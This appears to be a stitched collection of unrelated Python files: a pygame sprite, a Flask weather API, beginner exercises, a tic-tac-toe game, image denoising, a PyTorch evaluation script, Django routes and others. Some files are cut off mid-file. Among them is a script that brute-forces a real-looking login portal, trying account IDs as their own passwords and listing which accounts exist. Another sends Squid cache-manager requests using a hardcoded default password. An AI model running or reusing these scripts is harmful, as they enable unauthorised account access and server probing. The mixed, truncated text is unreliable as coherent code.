        if dist_vec.length() >= self.patrol_radius:
            # Change color of enemy image to the idle (green) variant
            self.original_img = self.make_image(self.size, pg.Color("green"))
            self.image = self.original_img.copy()
            self.patrol(dt)
        else:
            # Change color of enemy image to the aggressive (red) variant
            self.original_img = self.make_image(self.size, pg.Color("red"))
            self.image = self.original_img.copy()
            # Chase and shoot the player
            self.chase(dt, player_pos)
            # Clear the patrol points and reset current_patrol
            self.patrol_points.clear()
            self.current_patrol = 0
        # Keep sprites within screen area
        self.clamp()
        # Update damage bar position so it floats over the sprite
        pos = (self.rect.topleft[0] + 10, self.rect.topleft[1])
        self.damage_bar.rect.center = pos
        self.damage_bar.update(self)
        # Update bullets
        self.bullets.update(dt)
        # Flag for removal when out of health; EnemySpawner reaps killed sprites.
        if self.health <= 0:
            self.killed = True
    def patrol(self, dt):
        """Wander between randomly generated waypoints near the current position."""
        # Create patrol point if we ran out
        if len(self.patrol_points) <= self.current_patrol:
            range_ = 100
            nxt_patrol = random_pos(self.rect.center, range_)
            self.patrol_points.append(nxt_patrol)
        # Move to the current patrol point
        cpoint = self.patrol_points[self.current_patrol]
        self.move_to(cpoint, dt)
        # Update patrol point if we reached it (within 10 units)
        if pg.math.Vector2(cpoint[0] - self.rect.centerx, cpoint[1] - self.rect.centery).length() < 10:
            self.current_patrol += 1
    def chase(self, dt, player_pos):
        """Face the player, fire, and close the distance."""
        # 1. Look towards the player
        self.rotate(player_pos)
        # 2. Shoot the player
        self.shoot_bullet()
        # 3. Follow the player
        self.move_to(player_pos, dt, isPlayer=True)
    def move_to(self, pos, dt, isPlayer=False):
        """Step toward *pos* at self.speed; stops within 10 units of the target."""
        # Point towards target
        self.rotate(pos)
        # Calculate distance between current pos and target, and direction
        vec = pg.math.Vector2(pos[0] - self.true_pos[0], pos[1] - self.true_pos[1])
        direction = vec.normalize()
        # Progress towards the target
        if vec.length() > 10:
            self.true_pos[0] += direction[0] * self.speed * dt
            self.true_pos[1] += direction[1] * self.speed * dt
            vec = pg.math.Vector2(pos[0] - self.true_pos[0], pos[1] - self.true_pos[1])
            self.rect.center = self.true_pos
        else:
            # If the target is not a player, advance to the next patrol point
            if not isPlayer:
                self.current_patrol += 1
    def rotate(self, pos):
        """Rotate the sprite image to face *pos*; stores the angle for bullets."""
        offset = (pos[1] - self.rect.centery, pos[0] - self.rect.centerx)
        self.angle = 90 - math.degrees(math.atan2(*offset))
        self.image = pg.transform.rotate(self.original_img, self.angle)
        self.rect = self.image.get_rect(center=self.rect.center)
    def shoot_bullet(self):
        """Fire one bullet every bullet_interval calls.

        NOTE(review): the bullet direction comes from pg.mouse.get_pos(), i.e.
        the mouse cursor, not the player's position — confirm this is intended.
        Also relies on self.angle, which is only set once rotate() has run.
        """
        if self.bullet_time % self.bullet_interval == 0:
            self.shoot.play()
            pos = pg.mouse.get_pos()
            vec = pg.math.Vector2(pos[0] - self.true_pos[0], pos[1] - self.true_pos[1]).normalize()
            gun_pos = (self.rect.centerx + (vec.x * 25), self.rect.centery + (vec.y * 25))
            b = Bullet(gun_pos, self.angle, color=pg.Color('red'))
            self.bullets.add(b)
        self.bullet_time += 1
    def clamp(self):
        """Keep the sprite (and its float position) inside the display surface."""
        screen_rect = pg.display.get_surface().get_rect()
        if not screen_rect.contains(self.rect):
            self.rect.clamp_ip(screen_rect)
            self.true_pos = list(self.rect.center)
    def check_collision(self, player):
        # Check for collision with player; freeze while overlapping
        if self.rect.colliderect(player.rect):
            # Resolve collision
            self.speed = 0
        else:
            self.speed = 100
        # Check for collision with player bullets; each hit costs 10 health
        if player.bullets:
            for bullet in player.bullets:
                if self.rect.colliderect(bullet.rect):
                    bullet.kill()
                    self.health -= 10
|
# Import dependencies
import numpy as np
import pandas as pd
import datetime as dt
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
#################################################
# Database Setup
#################################################
# Connect to the bundled SQLite weather database.
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# We can view all of the classes that automap found (result unused; kept for reference)
Base.classes.keys()
# Save reference to the table
Measurement = Base.classes.measurement
Station = Base.classes.station
# Create our session (link) from Python to the DB
# NOTE(review): a single module-level session is shared by every request —
# confirm this is acceptable for the intended single-user usage.
session = Session(engine)
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
#################################################
# Flask Routes
#################################################
@app.route("/")
def welcome():
"""List all available api routes."""
return (
f"Hawaii Surfs Up Available API Routes:<br/>"
f"/api/v1.0/precipitation<br>"
f"/api/v1.0/stations<br>"
f"/api/v1.0/tobs<br>"
f"/api/v1.0/start_date<br>"
f"/api/v1.0/start_date/end_date<br>"
f"Note: start_date and end_date would be in 'YYYY-MM-DD' format.<br>"
)
@app.route("/api/v1.0/precipitation")
def precipitation():
# Query results to a Dictionary using `date` as the key and `prcp` as the value.
prcp_results = session.query(Measurement.date,Measurement.prcp).filter(Measurement.date).all()
all_prcp = {}
for result in prcp_results:
date = result[0]
prcp = result[1]
all_prcp[date] = prcp
return jsonify(all_prcp)
@app.route("/api/v1.0/stations")
def stations():
# Return a json list of stations from the dataset.
station_results = session.query(Station.station).all()
all_stations = list(np.ravel(station_results))
return jsonify(all_stations)
@app.route("/api/v1.0/tobs")
def prev_temp():
# Return a json list of Temperature Observations (tobs) for the previous year -
# Using 2016-08-23 as previous year date start point since the last data point is 2017-08-23
prev_results = session.query(Measurement.tobs).filter(Measurement.date >= "2016-08-23").all()
prev_tobs = []
prev_tobs = list(np.ravel(prev_results))
return jsonify(prev_tobs)
@app.route("/api/v1.0/<start_date>")
def temp_start(start_date):
# Query using start date
start_results = session.query(func.min(Measurement.tobs), func.max(Measurement.tobs), func.avg(Measurement.tobs)).filter(Measurement.date >= start_date).first()
# Create dictionary from results
temp_start_dict = {"TMIN": start_results[0], "TMAX": start_results[1], "TAVG": start_results[2]}
return jsonify(temp_start_dict)
@app.route("/api/v1.0/<start_date>/<end_date>")
def temp_start_end(start_date, end_date):
# Query using start date and end date
start_end_results = session.query(func.min(Measurement.tobs), func.max(Measurement.tobs), func.avg(Measurement.tobs)).filter(Measurement.date >= start_date, Measurement.date <= end_date).first()
# Create dictionary from results
temp_end_dict = {"TMIN": start_end_results[0], "TMAX": start_end_results[1], "TAVG": start_end_results[2]}
return jsonify(temp_end_dict)
if __name__ == '__main__':
app.run(debug=True) |
# -*- python -*-
# Assignment: Making and Reading from Dictionaries
# Create a dictionary containing some information about yourself.
# The keys should include name, age, country of birth, favorite language.
# Sample personal-information dictionary for the exercise below; the
# values are deliberately placeholders.
my_info = {
    'name': 'Firstname Lastname',
    'age': 25,
    'country of birth': 'USA',
    'favorite language': 'Many'
}
# Write a function that can take in and print out any dictionary keys and values.
# The output will look something like the following:
#
# My name is Anna
# My age is 101
# My country of birth is The United States
# My favorite language is Python
# There are two steps to this process:
# - building a dictionary
# - gathering all the data from it
#
# Note: The majority of data we will manipulate as web developers will be hashed
# in a dictionary using key-value pairs. Repeat this assignment a few times to
# really get the hang of unpacking dictionaries, as it's a very common requirement
# of any web application.
def print_dict(d):
    """Print every key/value pair of *d* as "My <key> is <value>".

    Uses the print() function form, which runs on both Python 2 and 3;
    the original used the Python-2-only print statement, which is a
    SyntaxError under Python 3.
    """
    for key in d:
        print("My {} is {}".format(key, d[key]))
print "Testing print_dict ..."
print_dict( my_info )
print "End testing print_dict"
|
# Assignment "Tic-Tac-Toe" by Federico Pregnolato
# Create a Tic-Tac-Toe game to play in Python
import math
from typing import Counter
def main():
    """Run an interactive two-player tic-tac-toe game on an N x N grid.

    Bug fix: when player O completed a winning line the original printed
    "Congratulations player X!" during X's turn; the correct winner is now
    reported.  The duplicated per-player input/validation/status code has
    been factored into helpers; prompts and messages are unchanged.
    """
    grid_squared = int(input('How many squares do you want on your grid? '))
    max_val = grid_squared**2
    n_digits = int(math.log10(max_val)) + 1
    grid = create_grid(grid_squared)
    draw_grid(grid, n_digits)
    player_x = 'X'
    player_o = 'O'
    number_chosen = []

    def _read_selection(label):
        # Prompt until the player enters an in-range, not-yet-used square number.
        selection = int(input(f"{label}'s turn to choose a square (1-{max_val}): "))
        while True:
            if selection < 1 or selection > max_val:
                selection = int(input(f"Incorrect value. Please choose a value between 1 and {max_val}: "))
            elif selection in number_chosen:
                selection = int(input(f"Value already chosen. Please choose a value between 1 and {max_val} not already chosen: "))
            else:
                break
        number_chosen.append(selection)
        return selection

    def _take_turn(label, player):
        # One half-move: read input, apply and redraw, report game status.
        # Returns True when the game is over.
        selection = _read_selection(label)
        updated_grid = change_element(selection, grid, player)
        draw_grid(updated_grid, n_digits)
        status = status_checker(updated_grid, player_x, player_o, max_val)
        if status == 'player_x':
            print("Congratulations player X! You won the game")
            return True
        if status == 'player_o':
            # Fixed: previously congratulated player X here.
            print("Congratulations player O! You won the game")
            return True
        if status == 'draw':
            print('Draw. Thanks for playing the game.')
            return True
        return False

    while True:
        if _take_turn('x', player_x):
            break
        if _take_turn('o', player_o):
            break
def create_grid(n_rows_cols=3):
    """Build an n x n grid whose cells are numbered 1..n*n, row by row."""
    return [
        [row * n_rows_cols + col + 1 for col in range(n_rows_cols)]
        for row in range(n_rows_cols)
    ]
def draw_grid(grid_array, n_digits):
    """Pretty-print the grid, padding every cell to n_digits columns.

    Two separator widths are used: a narrower one while cell numbers are
    single digits and a wider one once they reach two or more digits.
    """
    print()
    for row in grid_array:
        for element in row:
            print(f"{element:{n_digits}}", end=' ')
            print('|', end = ' ')
        print()
        if n_digits == 1:
            print('--', end = '')
            # One '+---' joint per column, skipping the last column.
            for _ in range(len(row)):
                if _ == range(len(row))[-1]:
                    continue
                print('+---', end = '')
            print()
        else:
            print('---', end = '')
            # Wider '+----' joints for multi-digit cells, again skipping the last.
            for _ in range(len(row)):
                if _ == range(len(row))[-1] and n_digits >= 2:
                    continue
                print('+----', end = '')
            print()
    print()
def change_element(number, grid_array, player):
    """Replace the cell holding *number* with the player's mark, in place.

    Returns the (mutated) grid for caller convenience.
    """
    for row in grid_array:
        for idx, cell in enumerate(row):
            if cell == number:
                row[idx] = player
    return grid_array
def status_checker(grid_array, player_x, player_o, max_val):
    """Evaluate the grid and return 'player_x', 'player_o', 'draw', or None.

    Bug fix: the original returned result4 (the anti-diagonal result, always
    None at that point) when only the draw check succeeded, so finished draws
    were reported as still-in-progress games.
    """
    # All checks are evaluated up front, then the first conclusive one wins
    # (win checks are ordered before the draw check).
    results = (
        horizontal_checker(grid_array, player_x, player_o),
        vertical_checker(grid_array, player_x, player_o),
        lr_diagonal_checker(grid_array, player_x, player_o),
        rl_diagonal_checker(grid_array, player_x, player_o),
        draw_checker(grid_array, player_x, player_o, max_val),
    )
    for result in results:
        if result is not None:
            return result
    return None
def horizontal_checker(grid_array, player_x, player_o):
    """Return 'player_x'/'player_o' if either owns a complete row, else None."""
    for row in grid_array:
        if all(cell == player_x for cell in row):
            return 'player_x'
        if all(cell == player_o for cell in row):
            return 'player_o'
    return None
def vertical_checker(grid_array, player_x, player_o):
    """Return 'player_x'/'player_o' if either owns a complete column, else None."""
    size = len(grid_array)
    for col in range(size):
        column = [grid_array[row][col] for row in range(size)]
        if column.count(player_x) == size:
            return 'player_x'
        if column.count(player_o) == size:
            return 'player_o'
    return None
def lr_diagonal_checker(grid_array, player_x, player_o):
    """Check the main diagonal (top-left to bottom-right) for a winner."""
    diagonal = [grid_array[i][i] for i in range(len(grid_array))]
    if all(cell == player_x for cell in diagonal):
        return 'player_x'
    if all(cell == player_o for cell in diagonal):
        return 'player_o'
    return None
def rl_diagonal_checker(grid_array, player_x, player_o):
    """Check the anti-diagonal (top-right to bottom-left) for a winner.

    Bug fix: the original tested grid_array[i][i] (the MAIN diagonal) for
    player_o, so O could never win on the anti-diagonal.  Both players are
    now checked against the same anti-diagonal cell.
    """
    size = len(grid_array)
    counter_x = 0
    counter_o = 0
    for i in range(size):
        cell = grid_array[i][(size - 1) - i]
        if cell == player_x:
            counter_x += 1
        elif cell == player_o:
            counter_o += 1
    if counter_x == size:
        return 'player_x'
    elif counter_o == size:
        return 'player_o'
    return None
def draw_checker(grid_array, player_x, player_o, max_val):
    """Return 'draw' when every one of the max_val squares is claimed, else None."""
    claimed = sum(
        1
        for row in grid_array
        for cell in row
        if cell == player_x or cell == player_o
    )
    return 'draw' if claimed == max_val else None
if __name__ == '__main__':
main() |
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 12 15:56:48 2017
@author: modellav
"""
# Image Processing
# Import packages
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from skimage import img_as_float
from skimage.restoration import nl_means_denoising
from scipy import misc
from scipy.signal import convolve2d
import math
from heapq import *
######## IMAGE DENOISING ########
######## USE SK-IMAGE ########
#function to get standard dev of noise in a B&W image
def estimate_noise(I):
    """Estimate the noise standard deviation of a 2-D grayscale image.

    Convolves the image with a 3x3 Laplacian-difference mask and scales the
    absolute residual sum by the interior pixel count.
    """
    height, width = I.shape
    laplacian_mask = [[1, -2, 1],
                      [-2, 4, -2],
                      [1, -2, 1]]
    residual = np.sum(np.absolute(convolve2d(I, laplacian_mask)))
    return residual * math.sqrt(0.5 * math.pi) / (6 * (width - 2) * (height - 2))
############ DENOISE BLACK AND WHITE IMAGES ################
#read 2D image
# NOTE(review): scipy.misc.imread and skimage's nl_means_denoising are
# deprecated/removed in newer releases — confirm the pinned library versions.
image = misc.imread('lena_noisy.png')
shape = image.shape
image_matrix = img_as_float(image)
#estimate noise standard dev
sigma = estimate_noise(image_matrix)
#use package to denoise image
denoise_image = nl_means_denoising(image_matrix, 7, 9, sigma)
#plot noisy image and result, in black and white
fig, ax = plt.subplots(ncols=2, figsize=(8, 4), sharex=True, sharey=True,
subplot_kw={'adjustable': 'box-forced'})
ax[0].imshow(image_matrix, cmap = cm.Greys_r)
ax[0].axis('off')
ax[0].set_title('noisy')
ax[1].imshow(denoise_image, cmap = cm.Greys_r)
ax[1].axis('off')
ax[1].set_title('non-local means')
fig.tight_layout()
plt.show()
############ DENOISE COLOR IMAGES ################
#read 3D image
image = misc.imread('flower_0.10_noisy.jpg')
shape = image.shape
image_matrix = img_as_float(image)
#use package to denoise image
#(fixed smoothing weight 0.08 here instead of an estimated sigma, since
# estimate_noise only handles 2-D grayscale arrays)
denoise_image = nl_means_denoising(image_matrix, 7, 9, 0.08)
#plot noisy image and result, in color
fig, ax = plt.subplots(ncols=2, figsize=(8, 4), sharex=True, sharey=True,
subplot_kw={'adjustable': 'box-forced'})
ax[0].imshow(image_matrix)
ax[0].axis('off')
ax[0].set_title('noisy')
ax[1].imshow(denoise_image)
ax[1].axis('off')
ax[1].set_title('non-local means')
fig.tight_layout()
plt.show() |
class Solution:
    # @param A : list of list of integers
    # @return an integer
    def minPathSum(self, A):
        """Minimum path sum from top-left to bottom-right, moving right/down.

        Works in place: on return, A holds suffix path sums (each cell is
        the best cost from that cell to the bottom-right corner).
        """
        rows, cols = len(A), len(A[0])
        for r in reversed(range(rows)):
            for c in reversed(range(cols)):
                below = A[r + 1][c] if r + 1 < rows else None
                right = A[r][c + 1] if c + 1 < cols else None
                if below is not None and right is not None:
                    A[r][c] += min(below, right)
                elif below is not None:
                    A[r][c] += below
                elif right is not None:
                    A[r][c] += right
        return A[0][0]
|
def remove_url_anchor(url):
    """Return *url* with the first '#' and everything after it removed."""
    # str.partition yields the whole string unchanged when '#' is absent,
    # matching the try/except ValueError behaviour of the original.
    return url.partition("#")[0]
'''
Complete the function/method so that it returns the url with
anything after the anchor (#) removed.
Examples:
# returns 'www.codewars.com'
remove_url_anchor('www.codewars.com#about')
# returns 'www.codewars.com?page=1'
remove_url_anchor('www.codewars.com?page=1')
'''
|
import os
import torch
import torch.nn as nn
import numpy as np
from easydict import EasyDict as edict
import logging
import cv2
import time
from network_factory import get_network
from datasets.loader_factory import get_loader
from utils import load_test_checkpoints, CalculateAcc, \
SelfData, load_cfg, print_to_screen
def test(test_loader, model, logger=None, Writer=None):
    """Run the generator on line/noise image pairs and dump inputs/outputs as JPEGs.

    Images are written to cfg.PATH.RES_TEST, which is expected at module scope.

    Bug fix: its_num was printed in the progress line but never defined in
    this function (it only existed in val()/embedding()), so the first
    iteration raised NameError.  It is now set to len(test_loader).
    """
    model.eval()
    its_num = len(test_loader)  # fix: previously referenced without being defined
    with torch.no_grad():
        for its, (img_line, img_noise) in enumerate(test_loader):
            img_line = img_line.cuda() if torch.cuda.is_available() else img_line
            img_noise = img_noise.cuda() if torch.cuda.is_available() else img_noise
            # The generator consumes line art and noise concatenated channel-wise.
            g_results = model(torch.cat((img_line, img_noise), 1))
            for i in range(img_line.shape[0]):
                img_line_test = img_line[i].cpu().numpy().transpose((1,2,0)) * 255
                img_line_test = img_line_test.squeeze()
                cv2.imwrite((cfg.PATH.RES_TEST+"line_{}.jpg".format(i+its)), img_line_test)
                img_res_test = g_results[i].cpu().numpy().transpose((1,2,0)) * 255
                cv2.imwrite((cfg.PATH.RES_TEST+"res_{}.jpg".format(i+its)), img_res_test)
                print("{}/{}".format(i+its,its_num))
def embedding(val_loader,val_loader_1, model_0, model_1, model_2, logger, print_fre=50):
    """Ensemble-evaluate three models by averaging their outputs; returns top-1 accuracy.

    model_0 and model_2 consume batches from val_loader; model_1 consumes the
    parallel batches from val_loader_1 (presumably the same samples with a
    different preprocessing — verify against the loader configs).
    """
    model_0.eval()
    model_1.eval()
    model_2.eval()
    its_num = len(val_loader)
    acc_single_val = CalculateAcc()
    data_begin = time.time()
    with torch.no_grad():
        for its, (load_0, load_1) in enumerate(zip(val_loader,val_loader_1)):
            data_time = time.time()-data_begin
            imgs, targets, imgs_1 = load_0[0], load_0[1], load_1[0]
            # NOTE(review): imgs_1 is never moved to the GPU, unlike imgs and
            # targets — confirm model_1 runs on CPU or that this is a bug.
            imgs = imgs.cuda() if torch.cuda.is_available() else imgs
            targets = targets.cuda() if torch.cuda.is_available() else targets
            outputs_0 = model_0(imgs)
            outputs_1 = model_1(imgs_1)
            outputs_2 = model_2(imgs)
            # Simple unweighted average of the three model outputs.
            outputs = (outputs_0 + outputs_1 + outputs_2)/3
            # No loss is computed during embedding; zero keeps logging uniform.
            loss = 0
            train_time = time.time()-(data_time+data_begin)
            data_begin = time.time()
            acc_single_val.add_value(outputs.cpu(),targets.cpu())
            mem = torch.cuda.memory_cached() / 1E9 if torch.cuda.is_available() else 0
            if its % print_fre == 0:
                print_to_screen(loss, 0, its, 0, its_num,
                    logger, data_time, train_time, mem, acc=acc_single_val.print_())
    return acc_single_val.print_()
def val(val_loader, model, logger=None, loss_function=None, epoch=0, print_fre=50):
    """Evaluate *model* on val_loader; returns (top-1 accuracy, mean loss)."""
    model.eval()
    its_num = len(val_loader)
    acc_single_val = CalculateAcc()
    loss_val = SelfData()
    data_begin = time.time()
    with torch.no_grad():
        for its, (imgs, targets) in enumerate(val_loader):
            data_time = time.time()-data_begin
            imgs = imgs.cuda() if torch.cuda.is_available() else imgs
            targets = targets.cuda() if torch.cuda.is_available() else targets
            outputs = model(imgs)
            # Loss function is optional; a zero tensor keeps the logging uniform.
            loss = loss_function(outputs,targets) if loss_function is not None else torch.tensor(0)
            train_time = time.time()-(data_time+data_begin)
            data_begin = time.time()
            loss_val.add_value(loss.cpu())
            acc_single_val.add_value(outputs.cpu(),targets.cpu())
            mem = torch.cuda.memory_cached() / 1E9 if torch.cuda.is_available() else 0
            if its % print_fre == 0:
                print_to_screen(loss, 0, its, epoch, its_num,
                    logger, data_time, train_time, mem, acc=acc_single_val.print_())
    return acc_single_val.print_(), loss_val.avg()
if __name__ == "__main__":
import sys
if len(sys.argv) < 2:
print ("Usage: python test.py [eval, test, embedding]")
else:
cmd = sys.argv[1]
from config_cub import cfg
logger = load_cfg(cfg)
model = get_network(cfg.MODEL.NAME, cfg=cfg.MODEL, logger=logger)
model = torch.nn.DataParallel(model, cfg.GPUS).cuda() if torch.cuda.is_available() else model
load_test_checkpoints(model, cfg.PATH, logger, use_best=True)
if cmd == 'eval':
test_loader = get_loader(cfg.DATASET_TRPE, cfg.PATH.EVAL, 'eval',label_path=cfg.PATH.LABEL, cfg=cfg.TRAIN, logger=logger)
acc_val, _ = val(test_loader, model, logger, print_fre=cfg.PRINT_FRE,)
logger.info("Prec@1:%.4f"%(acc_val))
elif cmd =='test':
test_loader = get_loader(cfg.DATASET_TRPE, cfg.PATH.TEST, 'test', cfg.TRAIN, logger)
test(test_loader, model, logger)
elif cmd =='embedding':
test_loader = get_loader(cfg.DATASET_TRPE, cfg.PATH.EVAL, 'eval',label_path=cfg.PATH.LABEL, cfg=cfg.TRAIN, logger=logger)
from config_cub_1 import cfg1
logger = load_cfg(cfg1)
model_1 = get_network(cfg1.MODEL.NAME, cfg=cfg1.MODEL, logger=logger)
model_1 = torch.nn.DataParallel(model_1, cfg1.GPUS).cuda() if torch.cuda.is_available() else model_1
load_test_checkpoints(model_1, cfg1.PATH, logger, use_best=True)
test_loader_1 = get_loader(cfg1.DATASET_TRPE, cfg1.PATH.EVAL, 'eval',label_path=cfg1.PATH.LABEL, cfg=cfg1.TRAIN, logger=logger)
from config_cub_2 import cfg2
logger = load_cfg(cfg2)
model_2 = get_network(cfg2.MODEL.NAME, cfg=cfg2.MODEL, logger=logger)
model_2 = torch.nn.DataParallel(model_2, cfg2.GPUS).cuda() if torch.cuda.is_available() else model_2
load_test_checkpoints(model_2, cfg2.PATH, logger, use_best=True)
acc_val = embedding(test_loader, test_loader_1, model,model_1,model_2, logger)
logger.info("Embedding Prec@1:%.4f"%(acc_val))
else:
print ("Usage: python test.py [eval, test]")
|
import time
import base64
#Retrieve Squid proxy info
# Interactive setup: defaults target a lab box (10.10.10.200:3128).
HOST_IP = input("[+] Enter squid host IP : ") or "10.10.10.200"
HOST_PORT = int(input("[+] Enter squid PORT (Default 3128) : ") or 3128)
CMD = input("[+] Enter command to execute (menu) : ") #or "menu"
#Default ones
HOST = "Host: " + HOST_IP
USER_AGENT = "User-Agent: squidclient/4.6"
ACCEPT = "Accept: */*"
# cache_object:// is Squid's cache-manager scheme; CMD selects the report.
URL = "GET cache_object://" + HOST_IP + ":" + str(HOST_PORT) + "/"+CMD+" HTTP/1.1"
#Credentials
creds = input("[+] Do you have any credentials ? [Y\\n]: ").lower() or "y"
if creds == "y":
    USERNAME = input("[+] Enter squidclient username (Default cachemgr): ") or "cachemgr"
    PASSWORD = input("[+] Enter squidclient password : ") or "Thah$Sh1"
    # HTTP Basic auth header: base64("user:password").
    str_b64 = USERNAME + ":" + PASSWORD
    AUTHORIZATION = "Authorization: Basic " + base64.b64encode(bytes(str_b64.encode('ascii'))).decode('utf-8')
    crafted_url = URL + "\r\n" + USER_AGENT + "\r\n" + HOST + "\r\n" + ACCEPT + "\r\n" + AUTHORIZATION + "\n\n"
else:
    crafted_url = URL + "\r\n" + USER_AGENT + "\r\n" + HOST + "\r\n" + ACCEPT + "\n\n"
def netcat(host, port, content):
    """Open a TCP connection to host:port, send *content*, and print the reply.

    Bug fix: the original printed the growing response buffer inside the
    recv loop AND again after it, so the output was duplicated (and partial
    buffers were repeated for multi-chunk responses).  The response is now
    accumulated and printed exactly once, after the server closes the
    connection.
    """
    import socket
    print("[+] Creating connection with squid proxy ... ")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print("[+] Sending content ...")
    s.sendall(content)
    time.sleep(0.5)
    chunks = []
    while True:
        data = s.recv(1024)
        if not data:
            break
        chunks.append(data.decode())
    print("".join(chunks))
    print("[+] Connection closed ...")
    s.close()
# Send the crafted cache-manager request to the proxy and print the reply.
netcat(HOST_IP, HOST_PORT, bytes(crafted_url.encode()))
#print(crafted_url)
|
import urllib
from urllib.request import urlopen
import re
import http.cookiejar
from http.cookiejar import CookieJar
import time
import html5lib
import requests
import webbrowser
from bs4 import BeautifulSoup
#begin = input('Enter beginning number ')
#end = input('Enter ending number ')
# Probe portal account ids mgh300..mgh398 (range() excludes `end`).
begin = 300
end = 399
mgh_list = []
for i in range(begin,end):
    mghid = 'mgh'+str(i)
    #print (mghid)
    url = 'https://phc.prontonetworks.com/cgi-bin/authlogin'
    r = requests.get(url)
    #count = 0
    # Attempt a login using the id as both username and password.
    payload = {'userId':mghid,'password':mghid,'serviceName':'ProntoAuthentication','Submit22':'Login'}
    r = requests.post(url, data=payload)
    soup = BeautifulSoup(r.content)
    list_item = soup.find_all("td",{"class":"errorText10"})
    #print(list_item[0])
    # NOTE(review): list_item[0] raises IndexError when the page contains no
    # errorText10 cell (e.g. a successful login) — confirm that cannot occur.
    if 'Sorry, that password was not accepted.' in str(list_item[0]):
        print('Account exists - ',mghid)
        mgh_list.append(mghid)
    elif 'Sorry, that account does not exist.' in str(list_item[0]):
        print('Account does not exist')
'''
if (soup.title == None):
    print (mghid + 'Fail!')
elif(soup.title.string == 'Successful Pronto Authentication'):
    print (mghid + 'Success!')
'''
'''
for i in range(begin,end):
    mghid = 'mgh'+str(i)
    print (mghid)
    url = 'https://phc.prontonetworks.com/cgi-bin/authlogin'
    r = requests.get(url)
    payload = {'userId':mghid,'password':'123456','serviceName':'ProntoAuthentication','Submit22':'Login'}
    #payload = {'sarav92711':'userId','qwerty':'password','ProntoAuthentication':'serviceName','Login':'Submit22'}
    r = requests.post(url, data=payload)
    soup = BeautifulSoup(r.content)
    if (soup.title == None):
        print (mghid + 'Fail!')
    elif(soup.title.string == 'Successful Pronto Authentication'):
        print (mghid + 'Success!')
url_out = 'https://phc.prontonetworks.com/cgi-bin/authlogout'
r = requests.get(url_out)
'''
|
""" Script to read the 'original' ROOT file from Julia's GENIE simulation and convert it to a ROOT-file, which can be
read from the DSNB-NC.exe generator of the JUNO offline software.
The ROOT-file, which is generated with this script can be used as input for the DSNB-NC.exe generator.
"""
# import ROOT
import datetime
# import glob
import NC_background_functions
import numpy as np
from matplotlib import pyplot as plt
# set the path of the inputs:
input_path = "/home/astro/blum/juno/atmoNC/data_Julia/"
# file name of the input file:
input_name = input_path + "gntp.101.gst.root"
# set the path, where the outputs are saved:
output_path = "/home/astro/blum/juno/atmoNC/data_NC/"
# Convert the GENIE gst ROOT file into the format read by DSNB-NC.exe.
NC_background_functions.convert_genie_file_for_generator(input_name, output_path)
|
# -*- coding: utf-8 -*-
# Read integers until the sentinel -9999, building two lists.
# NOTE(review): despite the prompts, num1/num2 are lists, not tuples; they
# are only converted with tuple() at print time.
num1=[]
num2=[]
print("Create tuple1:")
while True:
    num=int(input())
    if num == -9999:
        break
    num1.append(num)
print("Create tuple2:")
while True:
    num=int(input())
    if num == -9999:
        break
    num2.append(num)
# Concatenate copies so the inputs stay untouched, then sort a second copy.
numtotal=num1[:]
numtotal.extend(num2)
numsort=numtotal[:]
numsort.sort()
print(numtotal)
print("Combined tuple before sorting:",tuple(numtotal))
print("Combined list after sorting:",numsort) |
from .birthday import Birthday
def setup(bot):
    """discord.py extension entry point: register the Birthday cog on *bot*."""
    bot.add_cog(Birthday(bot))
|
#import module argv for command line input
from sys import argv

# Unpack the script name and the target filename from the command line.
script, filename = argv

# Print the file once.  Converted from the Python-2-only print statement /
# raw_input() to print() / input(), matching the Python 3 style used
# elsewhere in this file, and using `with` so the handles are closed
# (the original leaked both file objects).
with open(filename) as txt:
    print("Here's your file %r:" % filename)
    print(txt.read())

# Ask for the filename again and print the file a second time.
print("Type the filename again:")
file_again = input("> ")
with open(file_again) as txt_again:
    print(txt_again.read())
from django.conf.urls import *
from media.views import *
from django.conf import settings
from django.contrib import admin
import os.path
from django.views.generic import TemplateView
from django.conf.urls.static import static
from media import rest
from media.rest import *
from rest_framework import routers
from rest_framework.authtoken import views
# Absolute path to the project's bundled media directory.
site_media = os.path.join(
    os.path.dirname(__file__), 'site_media'
)
admin.autodiscover()
urlpatterns = [
    url(r'^admin/', include(admin.site.urls)),
    url(r'^$', main_page),
    url(r'^tags=(\w+)$', main_page),
    url(r'^embed/(\d+)/$', embed_page),
    url(r'^login/$', login_page),
    url(r'^user/(\w+)/$', user_page),
    url(r'^logout/$', logout_page),
    url(r'^download/', download),
    url(r'^changeviews/',changeviews),
    url(r'^delete_media/',delete_media),
    url(r'^favorite/',favorite),
    url(r'^delete_favorite/',delete_favorite),
    url(r'^more_space/', more_space),
    # (r'^featured/', featured),
    url(r'^categories/([\w.]{0,256})/$', main_page),
    url(r'^logthis/', logthis),
    url(r'^v/(\d+)/$',main_page),
    url(r'^360/$', TemplateView.as_view(template_name='360.html')),
    url(r'^api-token-auth/', views.obtain_auth_token),
    url(r'^rest/media/(?P<numvids>[0-9]+)$', rest.MediaList.as_view()),
    url(r'^rest/media/$', rest.MediaList.as_view()),
    #Admin
# Fix: static() forwards kwargs to the serve view, which expects
# document_root (the filesystem path to serve).  The original passed a
# nonexistent "document_user=settings.STATIC_user".
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
from agrupamento.kmeans import AlgoritmoDeKMeans
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import MinMaxScaler
import numpy as np
import pandas as pd
print("Agrupamento de vendas de jogos com k-means")
print("Receba indicações de games para jogar com base na plataforma e no gênero")
print()
# Load the video-game sales dataset.
file = "dataset/dataset.csv"
dataset = pd.read_csv(file)
pd.set_option('display.max_columns', 11)
# Rename columns (Portuguese labels, used by the menu output).
dataset.columns = ["ranking", "nome", "plataforma", "ano", "genero", "editora", "vendas_america_norte", "vendas_eu", "vendas_japao", "vendas_outros_paises", "vendas_totais"]
# info_dataset backs some menu options.
# FIX: .copy() avoids pandas SettingWithCopyWarning when set_index(inplace=True)
# is applied to what would otherwise be a view of `dataset`.
